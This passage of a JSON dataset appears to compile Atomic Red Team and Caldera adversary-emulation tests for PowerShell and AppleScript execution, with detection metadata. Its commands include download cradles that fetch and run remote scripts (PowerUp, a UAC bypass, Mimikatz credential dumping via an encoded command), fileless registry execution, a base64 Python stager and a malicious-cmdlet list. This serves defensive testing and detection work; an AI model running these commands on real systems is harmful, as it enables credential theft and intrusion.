_).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Invoke-AppPathBypass", + "auto_generated_guid": "06a220b6-7e29-4bd8-9d07-5b4d86742372", + "description": "Note: Windows 10 only. Upon execution windows backup and restore window will be opened.\n\nBypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Powershell.exe \"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\\Windows\\System32\\cmd.exe'\"\n", + "name": "command_prompt" + } + }, + { + "name": "Powershell MsXml COM object - with prompt", + "auto_generated_guid": "388a7340-dbc1-4c9d-8e59-b75ad8c6d5da", + "description": "Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, \"Download Cradle test success!\" will be displayed.\n\nProvided by https://github.com/mgreen27/mgreen27.github.io\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "url": { + "description": "url of payload to execute", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1" + } + }, + "executor": { + "command": "powershell.exe -exec bypass -noprofile \"$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText\"\n", + "name": "command_prompt" + } + }, + { + "name": "Powershell XML requests", + "auto_generated_guid": "4396927f-e503-427b-b023-31049b9b09a6", + "description": "Powershell xml download request. Upon execution, \"Download Cradle test success!\" will be dispalyed.\n\nProvided by https://github.com/mgreen27/mgreen27.github.io\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "url": { + "description": "url of payload to execute", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml" + } + }, + "executor": { + "command": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -exec bypass -noprofile \"$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX\"\n", + "name": "command_prompt" + } + }, + { + "name": "Powershell invoke mshta.exe download", + "auto_generated_guid": "8a2ad40b-12c7-4b25-8521-2737b0a415af", + "description": "Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display \"Download Cradle test success!\".\n\nProvided by https://github.com/mgreen27/mgreen27.github.io\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "url": { + "description": "url of payload to execute", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct" + } + }, + "executor": { + "command": "C:\\Windows\\system32\\cmd.exe /c \"mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()\"\n", + "name": "command_prompt" + } + }, + { + "name": "Powershell Invoke-DownloadCradle", + "auto_generated_guid": "cc50fa2a-a4be-42af-a88f-e347ba0bf4d7", + "description": "Provided by https://github.com/mgreen27/mgreen27.github.io\nInvoke-DownloadCradle is used to generate Network and Endpoint artifacts.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "steps": "1. Open Powershell_ise as a Privileged Account\n2. Invoke-DownloadCradle.ps1\n", + "name": "manual" + } + }, + { + "name": "PowerShell Fileless Script Execution", + "auto_generated_guid": "fa050f5e-bc75-4230-af73-b6fd7852cd73", + "description": "Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open \"C:\\Windows\\Temp\" and verify that\nart-marker.txt is in the folder.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "# Encoded payload in next command is the following \"Set-Content -path \"$env:SystemRoot/Temp/art-marker.txt\" -value \"Hello from the Atomic Red Team\"\"\nreg.exe add \"HKEY_CURRENT_USER\\Software\\Classes\\AtomicRedTeam\" /v ART /t REG_SZ /d \"U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=\"\niex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\\Software\\Classes\\AtomicRedTeam').ART)))\n", + "cleanup_command": "Remove-Item -path C:\\Windows\\Temp\\art-marker.txt -Force -ErrorAction Ignore\nRemove-Item HKCU:\\Software\\Classes\\AtomicRedTeam -Force -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "PowerShell Downgrade Attack", + "auto_generated_guid": "9148e7c4-9356-420e-a416-e896e9c0f73e", + "description": "This test requires the manual installation of PowerShell V2.\n\nAttempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/\n", + "supported_platforms": [ + "windows" + ], + "dependencies": [ + { + "description": "PowerShell version 2 must be installed\n", + "prereq_command": "if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host Automated installer not implemented yet, please install PowerShell v2 manually\n" + } + ], + "executor": { + "command": "powershell.exe -version 2 -Command Write-Host $PSVersion\n", + "name": "powershell" + } + }, + { + "name": "NTFS Alternate Data Stream Access", + "auto_generated_guid": "8e5c5532-1181-4c1d-bb79-b3a9f5dbd680", + "description": "Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, \"Stream Data Executed\" will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "ads_file": { + "description": "File created to store Alternate Stream Data", + "type": "String", + "default": "$env:TEMP\\NTFS_ADS.txt" + } + }, + "dependencies": [ + { + "description": "Homedrive must be an NTFS drive\n", + "prereq_command": "if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains \"NTFS\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host Prereq's for this test cannot be met automatically\n" + } + ], + "executor": { + "name": "powershell", + "command": "Add-Content -Path #{ads_file} -Value 'Write-Host \"Stream Data Executed\"' -Stream 'streamCommand'\n$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'\nInvoke-Expression $streamcommand\n", + "cleanup_command": "Remove-Item #{ads_file} -Force -ErrorAction Ignore\n" + } + }, + { + "name": "PowerShell Session Creation and Use", + "auto_generated_guid": "7c1acec2-78fa-4305-a3e0-db2a54cddecd", + "description": "Connect to a remote powershell session and interact with the host.\nUpon execution, network test info and 'T1086 PowerShell Session Creation and Use' will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "hostname_to_connect": { + "description": "The host to connect to, by default it will connect to the local machine", + "type": "String", + "default": "$env:COMPUTERNAME" + } + }, + "dependencies": [ + { + "description": "PSRemoting must be enabled\n", + "prereq_command": "Try {\n New-PSSession -ComputerName #{hostname_to_connect} -ErrorAction Stop | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n", + "get_prereq_command": "Enable-PSRemoting\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": true, + "command": "New-PSSession -ComputerName #{hostname_to_connect}\nTest-Connection $env:COMPUTERNAME\nSet-Content -Path $env:TEMP\\T1086_PowerShell_Session_Creation_and_Use -Value \"T1086 PowerShell Session Creation and Use\"\nGet-Content -Path $env:TEMP\\T1086_PowerShell_Session_Creation_and_Use\nRemove-Item -Force $env:TEMP\\T1086_PowerShell_Session_Creation_and_Use\n" + } + }, + { + "name": "ATHPowerShellCommandLineParameter -Command parameter variations", + "auto_generated_guid": "686a9785-f99b-41d4-90df-66ed515f81d7", + "description": "Executes powershell.exe with variations of the -Command parameter", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "command_line_switch_type": { + "description": "The type of supported command-line switch to use", + "type": "String", + "default": "Hyphen" + }, + "command_param_variation": { + "description": "The \"Command\" parameter variation to use", + "type": "String", + "default": "C" + } + }, + "dependencies": [ + { + "description": "The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.", + "prereq_command": "$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable\nif (-not $RequiredModule) {exit 1}\nif (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}", + "get_prereq_command": "Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force\n" + } + ], + "executor": { + "command": "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop", + "name": "powershell" + } + }, + { + "name": "ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments", + "auto_generated_guid": "1c0a870f-dc74-49cf-9afc-eccc45e58790", + "description": "Executes powershell.exe with variations of the -Command parameter with encoded arguments supplied", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "command_line_switch_type": { + "description": "The type of supported command-line switch to use", + "type": "String", + "default": "Hyphen" + }, + "command_param_variation": { + "description": "The \"Command\" parameter variation to use", + "type": "String", + "default": "C" + }, + "encoded_arguments_param_variation": { + "description": "The \"EncodedArguments\" parameter variation to use", + "type": "String", + "default": "EA" + } + }, + "dependencies": [ + { + "description": "The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.", + "prereq_command": "$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable\nif (-not $RequiredModule) {exit 1}\nif (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}", + "get_prereq_command": "Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force\n" + } + ], + "executor": { + "command": "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop", + "name": "powershell" + } + }, + { + "name": "ATHPowerShellCommandLineParameter -EncodedCommand parameter variations", + "auto_generated_guid": "86a43bad-12e3-4e85-b97c-4d5cf25b95c3", + "description": "Executes powershell.exe with variations of the -EncodedCommand parameter", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "command_line_switch_type": { + "description": "The type of supported command-line switch to use", + "type": "String", + "default": "Hyphen" + }, + "encoded_command_param_variation": { + "description": "The \"EncodedCommand\" parameter variation to use", + "type": "String", + "default": "E" + } + }, + "dependencies": [ + { + "description": "The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.", + "prereq_command": "$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable\nif (-not $RequiredModule) {exit 1}\nif (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}", + "get_prereq_command": "Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force\n" + } + ], + "executor": { + "command": "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop", + "name": "powershell" + } + }, + { + "name": "ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments", + "auto_generated_guid": "0d181431-ddf3-4826-8055-2dbf63ae848b", + "description": "Executes powershell.exe with variations of the -EncodedCommand parameter with encoded arguments supplied", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "encoded_command_param_variation": { + "description": "The \"EncodedCommand\" parameter variation to use", + "type": "String", + "default": "E" + }, + "command_line_switch_type": { + "description": "The type of supported command-line switch to use", + "type": "String", + "default": "Hyphen" + }, + "encoded_arguments_param_variation": { + "description": "The \"EncodedArguments\" parameter variation to use", + "type": "String", + "default": "EncodedArguments" + } + }, + "dependencies": [ + { + "description": "The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.", + "prereq_command": "$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable\nif (-not $RequiredModule) {exit 1}\nif (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}", + "get_prereq_command": "Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force\n" + } + ], + "executor": { + "command": "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop", + "name": "powershell" + } + }, + { + "name": "PowerShell Command Execution", + "auto_generated_guid": "a538de64-1c74-46ed-aa60-b995ed302598", + "description": "Use of obfuscated PowerShell to execute an arbitrary command; outputs \"Hello, from PowerShell!\". Example is from the 2021 Threat Detection Report by Red Canary.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "obfuscated_code": { + "description": "Defaults to: Invoke-Expression with a \"Write-Host\" line.", + "type": "String", + "default": "JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==" + } + }, + "executor": { + "command": "powershell.exe -e #{obfuscated_code}\n", + "name": "command_prompt" + } + }, + { + "name": "PowerShell Invoke Known Malicious Cmdlets", + "auto_generated_guid": "49eb9404-5e0f-4031-a179-b40f7be385e3", + "description": "Powershell execution of known Malicious PowerShell Cmdlets", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "Malicious_cmdlets": { + "description": "Known Malicious Cmdlets", + "type": "String", + "default": "\"Add-Persistence\", \"Find-AVSignature\", \"Get-GPPAutologon\", \"Get-GPPPassword\", \"Get-HttpStatus\", \"Get-Keystrokes\", \"Get-SecurityPackages\", \"Get-TimedScreenshot\", \"Get-VaultCredential\", \"Get-VolumeShadowCopy\", \"Install-SSP\", \"Invoke-CredentialInjection\", \"Invoke-DllInjection\", \"Invoke-Mimikatz\", \"Invoke-NinjaCopy\", \"Invoke-Portscan\", \"Invoke-ReflectivePEInjection\", \"Invoke-ReverseDnsLookup\", \"Invoke-Shellcode\", \"Invoke-TokenManipulation\", \"Invoke-WmiCommand\", \"Mount-VolumeShadowCopy\", \"New-ElevatedPersistenceOption\", \"New-UserPersistenceOption\", \"New-VolumeShadowCopy\", \"Out-CompressedDll\", \"Out-EncodedCommand\", \"Out-EncryptedScript\", \"Out-Minidump\", \"PowerUp\", \"PowerView\", \"Remove-Comments\", \"Remove-VolumeShadowCopy\", \"Set-CriticalProcess\", \"Set-MasterBootRecord\"\n" + } + }, + "executor": { + "name": "powershell", + "elevation_required": true, + "command": "$malcmdlets = #{Malicious_cmdlets}\nforeach ($cmdlets in $malcmdlets) {\n \"function $cmdlets { Write-Host Pretending to invoke $cmdlets }\"}\nforeach ($cmdlets in $malcmdlets) {\n $cmdlets}\n" + } + }, + { + "name": "PowerUp Invoke-AllChecks", + "auto_generated_guid": "1289f78d-22d2-4590-ac76-166737e1811b", + "description": "Check for privilege escalation paths using PowerUp from PowerShellMafia\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\niex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)\nInvoke-AllChecks\n", + "name": "powershell" + } + } + ] + }, + { + "id": "55678719-e76e-4df9-92aa-10655bbd1cf4", + "description": "User enumeration", + "name": "cmd.exe information gathering", + "tactic": "collection", + "technique": { + "attack_id": "T1059.001", + "name": "Command and Scripting Interpreter: PowerShell" + }, + "platforms": { + "windows": { + "psh": { + "command": "cmd.exe /c \"net user\" >> C:\\Windows\\temp\\history.log;\ncmd.exe /c \"whoami /priv\" >> C:\\Windows\\temp\\history.log;\ncmd.exe /c \"netstat -ano\" >> C:\\Windows\\temp\\history.log;" + } + } + } + }, + { + "id": "702bfdd2-9947-4eda-b551-c3a1ea9a59a2", + "description": "System Information Gathering Script", + "name": "PowerShell information gathering", + "tactic": "collection", + "technique": { + "attack_id": "T1059.001", + "name": "Command and Scripting Interpreter: PowerShell" + }, + "platforms": { + "windows": { + "psh,pwsh": { + "command": "powershell.exe -c \"Get-WmiObject -class win32_operatingsystem | select -property * | export-csv msdebug.log\";" + } + } + } + }, + { + "id": "e5f9de8f-3df1-4e78-ad92-a784e3f6770d", + "name": "Move Powershell & triage", + "description": "Copy powershell to non-standard location and perform triage commands", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1059.001", + "name": "PowerShell" + }, + "platforms": { + "windows": { + "psh": { + "command": "Copy-Item C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Windows\\Temp\\debug.exe;\nC:\\Windows\\Temp\\debug.exe get-process >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe get-localgroup >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe get-localuser >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe Get-ItemProperty Registry::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion >> C:\\Windows\\temp\\debug.log;\n" + } + } + } + }, + { + "id": "134b49a3-3f93-41bd-85f4-563eadbb6055", + "name": "Stop PowerShell processes", + "description": "Kill all PowerShell processes", + "tactic": "execution", + "technique": { + "attack_id": "T1059.001", + "name": "Command and Scripting Interpreter: PowerShell" + }, + "platforms": { + "windows": { + "pwsh": { + "command": "Get-Process -Name \"powershell\" | Stop-Process\n" + } + } + } + }, + { + "id": "315cedf1-4a3a-4015-b63f-149d64bacbbc", + "name": "Emulate Administrator Tasks", + "description": "Emulate administrator tasks on a system in a separate process", + "tactic": "execution", + "technique": { + "attack_id": "T1059.001", + "name": "Command and Scripting Interpreter: PowerShell" + }, + "platforms": { + "windows": { + "psh,pwsh": { + "command": "start powershell.exe -ArgumentList \"-NoP\",\"-StA\",\"-ExecutionPolicy\",\"bypass\",\".\\Emulate-Administrator-Tasks.ps1\"\n", + "cleanup": "Remove-Item -Force -Path \".\\Emulate-Administrator-Tasks.ps1\"\n", + "payloads": [ + "Emulate-Administrator-Tasks.ps1" + ] + } + } + } + }, + { + "id": "3796a00b-b11d-4731-b4ca-275a07d83299", + "name": "Impersonate user", + "description": "Run an application as a different user", + "tactic": "execution", + "technique": { + "attack_id": "T1059.001", + "name": "Command and Scripting Interpreter: PowerShell" + }, + "platforms": { + "windows": { + "psh": { + "command": "$job = Start-Job -ScriptBlock {\n $username = '#{host.user.name}';\n $password = '#{host.user.password}';\n $securePassword = ConvertTo-SecureString $password -AsPlainText -Force;\n $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;\n Start-Process Notepad.exe -NoNewWindow -PassThru -Credential $credential;\n};\nReceive-Job -Job $job -Wait;\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.user.name" + } + ] + }, + { + "plugins.stockpile.app.requirements.basic": [ + { + "source": "host.user.name", + "edge": "has_password", + "target": "host.user.password" + } + ] + } + ] + }, + { + "id": "bfff9006-d1fb-46ce-b173-92cb04e9a031", + "name": "PowerShell bitly Link Download", + "description": "Download", + "tactic": "execution", + "technique": { + "attack_id": "T1059.001", + "name": "Command and Scripting Interpreter: PowerShell" + }, + "platforms": { + "windows": { + "psh": { + "command": "powershell.exe -c IEX (New-Object Net.Webclient).downloadstring(\"https://bit.ly/33H0QXi\") \n" + } + } + } + }, + { + "id": "ccdb8caf-c69e-424b-b930-551969450c57", + "name": "PowerShell Invoke MimiKats", + "description": "Download", + "tactic": "execution", + "technique": { + "attack_id": "T1059.001", + "name": "Command and Scripting Interpreter: PowerShell" + }, + "platforms": { + "windows": { + "psh": { + "command": "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8ARQBtAHAAaQByAGUAUAByAG8AagBlAGMAdAAvAEUAbQBwAGkAcgBlAC8ANwBhADMAOQBhADUANQBmADEAMgA3AGIAMQBhAGUAYgA5ADUAMQBiADMAZAA5AGQAOAAwAGMANgBkAGMANgA0ADUAMAAwAGMAYQBjAGIANQAvAGQAYQB0AGEALwBtAG8AZAB1AGwAZQBfAHMAbwB1AHIAYwBlAC8AYwByAGUAZABlAG4AdABpAGEAbABzAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAiACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA==\n" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ] + ] + }, + { + "technique_id": "T1059.002", + "command_list": [ + "osascript -e \"do shell script \\\"echo \\\\\\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEsdGltZW91dD0zKS5yZWFkKCk7Cg=='));\\\\\\\" | python &\\\"\"\n", + "osascript bookmark.scpt #{host.chrome.bookmark_title[filters(max=1)]} #{server.malicious.url[filters(max=1)]}\n" + ], + "commands": [ + { + "command": "osascript -e \"do shell script \\\"echo \\\\\\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEsdGltZW91dD0zKS5yZWFkKCk7Cg=='));\\\\\\\" | python &\\\"\"\n", + "source": "atomics/T1059.002/T1059.002.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: AppleScript" + }, + { + "command": "osascript bookmark.scpt #{host.chrome.bookmark_title[filters(max=1)]} #{server.malicious.url[filters(max=1)]}\n", + "source": "data/abilities/execution/de52784d-4de6-4d4e-b79e-e7b68fe037fb.yml", + "name": "Add a malicous bookmark which looks like a current one" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1059.002", + "display_name": "Command and Scripting Interpreter: AppleScript", + "atomic_tests": [ + { + "name": "AppleScript", + "auto_generated_guid": "3600d97d-81b9-4171-ab96-e4386506e2c2", + "description": "Shell Script with AppleScript. The encoded python script will perform an HTTP GET request to 127.0.0.1:80 with a session cookie of 